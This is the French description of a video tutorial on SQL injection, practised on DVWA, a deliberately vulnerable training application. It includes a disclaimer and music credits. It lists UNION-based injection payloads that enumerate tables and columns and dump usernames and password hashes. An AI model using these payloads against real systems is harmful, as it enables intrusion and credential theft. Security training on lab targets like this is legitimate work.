Tutoriel en français expliquant le principe de l’injection SQL sur le framework DVWA.

Ce tutoriel a été réalisé sur une application prévue pour des tests d’intrusion.

Je ne vous encourage en aucun cas à reproduire ce type d’attaque sur un système qui ne vous appartient pas.

Le lien de DVWA :

http://www.dvwa.co.uk/

Les commandes utilisées :
1′ or 1=1#
1′ or 1=1 union select table_name from information_schema.tables#
1′ or 1=1 union select null, table_name from information_schema.tables#
1′ or 1=1 union select table_name, column_name from information_schema.columns#
1′ or 1=1 union select user, password from users#

Musique d’intro :
Titre: Mainstream Pop
Auteur: Bricks
Source: http://www.myspace.com/bricksof78
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/
Téléchargement (4MB): https://www.auboutdufil.com/index.php?id=312

La musique de fond :
Titre: Leaf
Auteur: KV
Source: https://soundcloud.com/kvmusicprod
Licence: https://www.creativecommons.org/licenses/by/4.0/
Téléchargement (5MB): https://www.auboutdufil.com/index.php?id=509